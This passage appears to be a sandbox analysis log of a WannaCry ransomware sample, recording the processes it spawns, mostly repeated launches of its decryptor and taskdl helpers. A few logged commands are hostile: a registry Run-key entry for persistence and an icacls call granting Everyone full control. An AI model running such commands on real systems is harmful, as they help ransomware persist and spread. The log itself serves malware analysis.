              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /fJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /QJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\System32\consent.exe consent.exe 5728 686 000001FA36427DE0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe vsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
